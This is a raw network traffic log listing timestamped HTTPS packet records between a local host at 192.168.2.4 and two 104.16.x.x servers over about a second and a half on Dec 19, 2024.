                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.509354115 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.509433985 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.509916067 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.509953022 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.551446915 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.551490068 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.570625067 CET49797443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.570666075 CET44349797104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.570735931 CET49797443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.571394920 CET49797443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.571410894 CET44349797104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.584037066 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.584117889 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.584153891 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.590230942 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.590308905 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.590337038 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.598115921 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.598181963 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.598207951 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.606004000 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.606080055 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.606105089 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.613719940 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.613790035 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.613815069 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.621566057 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.621644974 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.621668100 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.637281895 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.637384892 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.637393951 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.637404919 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.637440920 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.644915104 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.651226044 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.651299953 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.651329994 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.657741070 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.657835007 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.657850027 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.664355993 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.664405107 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.664417028 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.675148964 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.675220013 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.675230980 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.723345041 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.723376036 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.769347906 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.772456884 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.775043011 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.775111914 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.775132895 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.782613039 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.782711983 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.782732010 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.782778025 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.790930986 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.790950060 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.791009903 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.795196056 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.795269966 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.795288086 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.795329094 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.802849054 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.802867889 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.802930117 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.810643911 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.810661077 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.810719013 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.814651966 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.814668894 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.814718008 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.822417974 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.822501898 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.830135107 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.830257893 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.833112001 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.833187103 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.838790894 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.838867903 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.844453096 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.844526052 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.847419024 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.847479105 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.852984905 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.853096962 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.858669996 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.858745098 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977685928 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977835894 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977879047 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977950096 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977952957 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.977994919 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.978285074 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.978310108 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.978321075 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.978353977 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.082180977 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.082616091 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.082645893 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.082998037 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.083695889 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.083766937 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.083894014 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.090071917 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.090322018 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.090354919 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.091547966 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.091872931 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.091994047 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.092000008 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.092047930 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.127338886 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.144710064 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.411777020 CET44349787104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412018061 CET49787443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412036896 CET44349787104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412524939 CET44349787104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412832975 CET49787443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412928104 CET44349787104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.412952900 CET49787443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.455343008 CET44349787104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.461244106 CET49787443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.462583065 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.462817907 CET49788443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.462850094 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463411093 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463743925 CET49788443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463764906 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463865042 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463866949 CET49788443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463974953 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.463999987 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.464128971 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.464283943 CET49791443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.464307070 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.464672089 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465148926 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465362072 CET49791443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465431929 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465567112 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465589046 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465780973 CET49791443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465804100 CET49791443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465811968 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465826035 CET44349791104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465861082 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.465924978 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466264009 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466345072 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466365099 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466487885 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466551065 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466784000 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466842890 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.466865063 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.479433060 CET44349792104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.479640961 CET49792443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.479671955 CET44349792104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.480815887 CET44349792104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.481076002 CET49792443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.481182098 CET49792443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.481189013 CET44349792104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.481245995 CET44349792104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.507328033 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.507343054 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.507363081 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.508444071 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.508449078 CET49788443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.508450985 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.508449078 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.508479118 CET44349790104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.524225950 CET49792443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.542802095 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.542953014 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.543001890 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.543014050 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.543227911 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.543267012 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.543272972 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.551589012 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.551637888 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.551645041 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.555306911 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.555432081 CET49790443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.559715986 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.559766054 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.559773922 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.561971903 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562097073 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562151909 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562167883 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562654972 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562695026 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562700033 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562715054 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562767982 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.562779903 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.570703983 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.570766926 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.570780039 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.582117081 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.582174063 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.582185984 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.584887028 CET44349793104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.585127115 CET49793443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.585144997 CET44349793104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.586577892 CET44349793104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.586647034 CET49793443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.587938070 CET49793443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.588022947 CET44349793104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.588146925 CET49793443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.588160038 CET44349793104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.602128029 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.602138996 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.633527040 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.633527040 CET49793443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.648569107 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.662134886 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.681591034 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.711694002 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.711705923 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.727536917 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.727550030 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.758903980 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.774780035 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.781203032 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785401106 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785458088 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785475016 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785522938 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785875082 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.785901070 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.787678957 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.798144102 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.798202991 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.798214912 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.806266069 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.806324959 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.806338072 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.814424992 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.814486027 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.814498901 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.822673082 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.822736979 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.822751045 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.829169035 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.829224110 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.829236031 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.835561037 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.835618019 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.835629940 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.841964960 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.842026949 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.842056990 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.844140053 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.844350100 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.844383955 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.847975969 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.848047972 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.848385096 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.848443031 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.848496914 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:31.848521948 CET44349785104.16.102.112192.168.2.4
